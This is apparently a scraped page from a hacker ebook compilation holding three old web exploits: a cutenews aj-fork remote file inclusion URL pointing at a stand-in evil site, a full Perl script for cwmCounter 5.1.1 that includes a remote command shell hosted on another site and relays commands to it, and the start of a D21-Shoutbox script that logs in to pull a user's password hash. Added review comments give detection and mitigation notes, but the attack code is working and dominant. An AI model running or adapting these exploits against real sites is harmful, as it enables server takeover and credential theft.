
Hacker Professional Ebook part 366 pps


DeltasecurityTEAM www.Deltasecurity.ir
=========================================================== ================================================
* Portal Name : cutenews aj-fork
* Class = Remote File Inclusion ;
* Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip
* Found by = DeltahackingTEAM
* User In Delta Team (Tanha )
- Vulnerable Code include($cutepath.'/inc/plugins.php');
# NOTE(review): the include path begins with $cutepath, and the request shown
# below supplies `cutepath` in the query string of a directly requested
# inc/shows.inc.php. Presumably the application does not set the variable on
# that code path and PHP's register_globals fills it from the request -- TODO
# confirm against the cn_aj_167 source. Defensive fixes: set the base path
# inside the application (a constant or fixed value) instead of trusting a
# request-settable variable, refuse direct requests to files under inc/, and
# keep allow_url_include and register_globals disabled.
++++++++++++++++++++++++++++++++++++++++++++
- Exploit: http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?
Black_hat_cr(HCE)
cwmCounter 5.1.1 (statistic.php) Remote File Include Exploit
Code:
#!/usr/bin/perl
#
#cwmCounter Remote File Include Exploit
#
#Coded by bd0rk || SOH-Crew
#
#Usage: cwmCounter.pl [target] [cmd shell] [shell variable]
#
#Greetings: str0ke, TheJT, Kacper, rgod
#
#
# NOTE(review): proof-of-concept client for the statistic.php issue named in
# the title. It reads lines from STDIN and sends each one in a GET request to
# statistic.php, with a remote URL in the `path` query parameter, then prints
# the response body. The PHP side is not shown on this page; presumably
# statistic.php uses `path` in an include -- TODO confirm. For defenders:
#   * detection: access-log entries for statistic.php whose `path` value
#     contains "http://"; the text typed at the prompt is appended to the same
#     query string without encoding, so it is logged with the request;
#   * mitigation: never build include paths from request data, and keep
#     allow_url_include disabled.
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
# Both URL arguments must contain "http://" (the match is unanchored) and the
# third argument must be true; otherwise usage() prints help and exits.
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
# Perl treats the empty condition as true, so this outer loop only ends via
# the exit calls below.
while()
{
    print "[shell] \$";
    while(<STDIN>)
    {
        $cmd=$_;
        chomp($cmd);
        $xpl = LWP::UserAgent->new() or die;
        # One request per input line; this is the request shape described in
        # the detection note at the top of the script.
        $req = HTTP::Request->new(GET =>$Path.'statistic.php?path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
        $res = $xpl->request($req);
        $return = $res->content;
        # tr/// takes character lists, not regex classes: the brackets are
        # literal and map to themselves, so the effective change is
        # newline -> space.
        $return =~ tr/[\n]/[ ]/;
        # The patterns below match PHP warning / fatal-error text in the
        # response body. NOTE(review): a server that returns these messages to
        # clients presumably has display_errors enabled -- worth turning off
        # in production.
        if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
        elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
        elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
        # /(.*)/ matches any string (including the empty one), so this branch
        # is always taken and the else below is never reached. `last` leaves
        # the inner read loop; the outer loop then prints the prompt again.
        if($return =~ /(.*)/)
        {
            $finreturn = $1;
            # Reverse of the earlier tr: spaces become newlines again.
            $finreturn=~ tr/[ ]/[\n]/;
            print "\r\n$finreturn\n\r";
            last;
        }
        else {print "[shell] \$";}}}last;
# Prints the banner. The third string literal contains a space and a line
# break exactly as they appear on this page.
sub head()
 {
 print "\n========================================================= ===================\r\n";
 print " *cwmCounter Remote File Include Exploit*\r\n";
 print "========================================================== 
==================\r\n";
 }
# Prints the banner and the argument help, then exits the program.
sub usage()
 {
 head();
 print " Usage: cmwCounter.pl [target] [cmd shell location] [cmd shell variable]\r\n\n";
 print " <Site> - Full path to cwmCounter ex: http://www.site.com/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "========================================================== ==================\r\n";
 print " Bug Found by bd0rk \r\n";
 print " www.soh-crew.it.tt \r\n";
 print "========================================================== ==================\r\n";
 exit();
 }
# milw0rm.com [2006-12-19]
black_hat_cr(HCE)
D21-Shoutbox version 1.1 exploit
Code:
################################################
#!/usr/bin/perl #
# D21-Shoutbox #
# Author : longnhi #
# Exploit Coded by Windak & langtuhaohoa #
# We are : Www.HceGroup.Net - Www.HceGroup.Biz #
################################################
# NOTE(review): only the opening of this script is on this page. The visible
# part collects a forum URL, credentials, a user id and a table prefix, then
# logs in with a POST. The prompts and the unused $sql variable suggest a later
# SQL-based step, but that code is not shown here, so nothing below documents
# it.
use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;
# variables
my $login_page = '?act=Login&CODE=01';
my $id = '';
my $table_fix = '';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $i;
my $j;
# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;
# init the cookie jar
$ua->cookie_jar ($cj);
# allow redirects on post requests
push @{ $ua->requests_redirectable }, "POST";
# get user input
print ' Forum Use D21-Shoutbox URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
# %form is not declared in the visible code; with no `use strict` shown it is
# a package variable.
$form{entered_name} = $user;
print 'Your pass ? ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty; # to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty; # to turn it back on
print "\n" if $stty;
print 'id you want get hashpass? '; # it'll say next to one of their posts
# This second `my` masks the $id declared in the variables section above; the
# same happens for $table_fix below.
chomp (my $id = <STDIN>);
# The prompt literal contains a line break exactly as it appears on this page.
print ' Table prefix ( ex : ibf_ ) ? 
';
chomp ( my $table_fix = <STDIN>);
# parse the given base url
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }
# Login POST to ?act=Login&CODE=01. Nothing in the loop changes $tries and
# there is no delay, so an unsuccessful response is retried immediately; on the
# server side this appears as a burst of identical login POSTs from one client.
do
{
    $resp = $ua->post ($base_url . $login_page, [ UserName => $user, PassWord => $pass, CookieDate => 1, ]);
} while ($tries && !$resp->is_success());
# NOTE(review): the listing ends here on this page.

Ngày đăng: 04/07/2014, 12:20